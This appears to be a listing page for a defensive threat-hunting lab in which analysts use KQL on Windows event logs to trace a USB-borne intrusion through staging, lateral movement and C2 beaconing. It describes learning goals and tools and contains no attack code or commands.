Universal Bus

EasyThreat Hunting

Overview

This morning, someone left something behind on one of the seats. A small flash drive, unmarked, sitting right where the new IT contractor usually sits. Someone from facilities found it, figured it belonged to IT, and helpfully plugged it into an office workstation to check what was on it. Just trying to return it to its owner, right?  By lunch, the SOC dashboard lights up. Nothing dramatic, just a few anomalies buried under thousands of routine log entries. A file copied to an odd location. A process spawning from a temp directory. An outbound connection to an IP nobody recognizes. Most analysts would scroll right past it.  But you're not most analysts. Something rode that Universal Bus into your network, and now it's your job to figure out what.

Lab Details

Prerequisites & Requirements

  • Windows Event Logs: Basic understanding of Event IDs, log levels, and common fields.
  • KQL: Familiarity with Kusto Query Language — or willingness to learn as you go.
  • Attack Lifecycle: Understanding of common attack stages: Initial Access → Staging → Execution → Lateral Movement → C2.
  • Lab Environment: A KQL-capable interface will be provided with the challenge instance, pre-loaded with the dataset.
  • Encoding Basics: Basic knowledge of Base64 encoding and decoding.

What Will You Learn?

  • Threat Hunting at Scale: Performing structured hunts across a noisy, realistic corporate log dataset.
  • USB-Based Initial Access: Identifying removable media insertion events and payload staging from Windows event logs.
  • Attack Chain Tracing: Following payload staging, lateral movement via PsExec/SMB, and C2 beaconing patterns end-to-end.
  • PowerShell Deobfuscation: Extracting and decoding obfuscated -EncodedCommand and FromBase64String() payloads hidden in command lines.
  • Multi-Host Correlation: Correlating events across multiple hosts and timelines to reconstruct a full attack chain.
  • Noise vs. Signal: Separating real indicators of compromise from decoys and background noise.

Tools

  • Query Interface: KQL Web Interface — provided with the challenge instance (pre-loaded dataset).
  • Scripting: Python — for automated extraction and Base64 decoding (optional).
  • Decoding: CyberChef or command-line tools — for quick Base64 decoding.

Job Positions

Threat Hunter

Tags

KqlLog AnalysisPowershell LogsLateral MovementFalse PositiveSoc